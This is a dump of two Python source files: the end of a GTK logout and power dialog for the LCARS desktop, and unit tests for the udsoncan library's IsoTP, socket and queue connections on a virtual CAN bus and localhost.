proxy.call_sync(method_name, parameter, Gio.DBusCallFlags.NONE, 100, None)
@staticmethod
def get_handler(console_kit_method, systemd_method):
"""
:param console_kit_method: method name for action via ConsoleKit
:param systemd_method: method name for action via SystemD
:return: handler for calling the action or None, if action is not available
"""
if LcarsdeLogout.is_console_kit_method_available("Can" + console_kit_method):
return lambda: LcarsdeLogout.run_console_kit_method(console_kit_method)
elif LcarsdeLogout.is_systemd_method_available("Can" + systemd_method):
return lambda: LcarsdeLogout.run_systemd_method(systemd_method)
else:
return None
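    # For example, get_handler("Stop", "PowerOff") first probes ConsoleKit's CanStop,
    # then falls back to logind's CanPowerOff, and returns a callable that triggers the
    # matching Stop/PowerOff method (or None if neither backend supports the action).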
@staticmethod
def is_lock_screen_available():
return any(
os.access(os.path.join(path, "xdg-screensaver"), os.X_OK)
for path in os.environ["PATH"].split(os.pathsep)
)
@staticmethod
def lock_screen():
p = Process(target=lambda c: subprocess.Popen(c.split()), args=("xdg-screensaver lock",))
p.start()
@staticmethod
def logout():
"""
Terminate lcarswm.kexe.
"""
for process in psutil.process_iter():
if process.name() == "lcarswm.kexe":
process.terminate()
break
if __name__ == "__main__":
win = LcarsdeLogout()
win.connect("destroy", Gtk.main_quit)
win.show_all()
Gtk.main()
|
test_connection.py
|
from test.UdsTest import UdsTest
from udsoncan.connections import *
from test.stub import StubbedIsoTPSocket
import socket
import threading
import time
import unittest
try:
_STACK_UNVAILABLE_REASON = ''
_interface_name = 'vcan0'
import isotp
import can
s = isotp.socket()
s.bind(_interface_name,rxid=1,txid=2)
s.close()
_STACK_POSSIBLE = True
except Exception as e:
_STACK_UNVAILABLE_REASON = str(e)
_STACK_POSSIBLE = False
class TestIsoTPSocketConnection(UdsTest):
def setUp(self):
self.tpsock1 = StubbedIsoTPSocket(timeout=0.1)
self.tpsock2 = StubbedIsoTPSocket(timeout=0.1)
def test_open(self):
conn = IsoTPSocketConnection(interface='vcan0', rxid=0x001, txid=0x002, tpsock=self.tpsock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = IsoTPSocketConnection(interface='vcan0', rxid=0x100, txid=0x101, tpsock=self.tpsock1, name='unittest')
conn2 = IsoTPSocketConnection(interface='vcan0', rxid=0x101, txid=0x100, tpsock=self.tpsock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=0.3)
self.assertEqual(payload1, payload2)
class TestSocketConnection(UdsTest):
def server_sock_thread_task(self):
self.thread_started=True
self.sock1, addr = self.server_sock.accept()
def setUp(self):
self.thread_started = False
self.server_sock_thread = threading.Thread(target=self.server_sock_thread_task)
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.setblocking(False)
self.sock1 = None
self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.settimeout(0.5)
self.server_sock.bind(('127.0.0.1', 0))
self.server_sock.listen(1)
self.server_sock_thread.start()
t1 = time.time()
while not self.thread_started:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
time.sleep(0.01)
time.sleep(0.01)
self.sock2.connect(self.server_sock.getsockname())
t1 = time.time()
while self.sock1 is None:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
def tearDown(self):
if isinstance(self.sock1, socket.socket):
self.sock1.close()
if isinstance(self.sock2, socket.socket):
self.sock2.close()
if isinstance(self.server_sock, socket.socket):
self.server_sock.close()
def test_open(self):
conn = SocketConnection(self.sock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = SocketConnection(self.sock1, name='unittest')
conn2 = SocketConnection(self.sock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=1, exception=True)
self.assertEqual(payload1, payload2)
class TestQueueConnection(UdsTest):
def setUp(self):
self.conn = QueueConnection(name='unittest')
self.conn.open()
def tearDown(self):
self.conn.close()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
payload = b"\x00\x01\x02\x03"
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(frame, payload)
def test_send(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(frame, payload)
def test_truncate(self):
payload = b"\x00\x01\x02\x03"*5000
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
def test_reopen(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
self.conn.fromuserqueue.put(payload)
self.conn.close()
self.conn.open()
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertTrue(self.conn.touserqueue.empty())
@unittest.skipIf(_STACK_POSSIBLE == False, 'Cannot test TestPythonIsoTpConnection. %s' % _STACK_UNVAILABLE_REASON)
class TestPythonIsoTpConnection(UdsTest):
def __init__(self, *args, **kwargs):
UdsTest.__init__(self, *args, **kwargs)
if not hasattr(self.__class__, '_next_id'):
self.__class__._next_id=1
self.stack_txid = self.__class__._next_id
self.stack_rxid = self.__class__._next_id +1
self.__class__._next_id += 2
def make_bus(self):
return can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=500000, receive_own_messages=True)
def setUp(self):
self.vcan0_bus = self.make_bus()
addr = isotp.Address(isotp.AddressingMode.Normal_11bits, rxid=self.stack_rxid, txid=self.stack_txid)
self.conn = PythonIsoTpConnection(isotp.CanStack(bus=self.vcan0_bus, address=addr), name='unittest')
self.conn.open()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", extended_id = False))
frame = self.conn.wait_frame(timeout=1)
self.assertEqual(frame, b"\x01\x02\x03")
def test_send(self):
self.conn.send(b"\xAA\xBB\xCC\xDD\xEE\xFF")
t1 = time.time()
msg = self.vcan0_bus.recv(1)
self.assertIsNotNone(msg)
self.assertEqual(msg.data, b'\x06\xAA\xBB\xCC\xDD\xEE\xFF')
def test_reopen(self):
self.conn.send(b"\x0A\x0B\x0C\x0D")
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", extended_id = False))
self.conn.close()
self.vcan0_bus.shutdown()
self.vcan0_bus = self.make_bus()
self.conn.open(bus=self.vcan0_bus)
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertIsNone(self.vcan0_bus.recv(0))
def tearDown(self):
self.conn.close()
self.vcan0_bus.shutdown()
|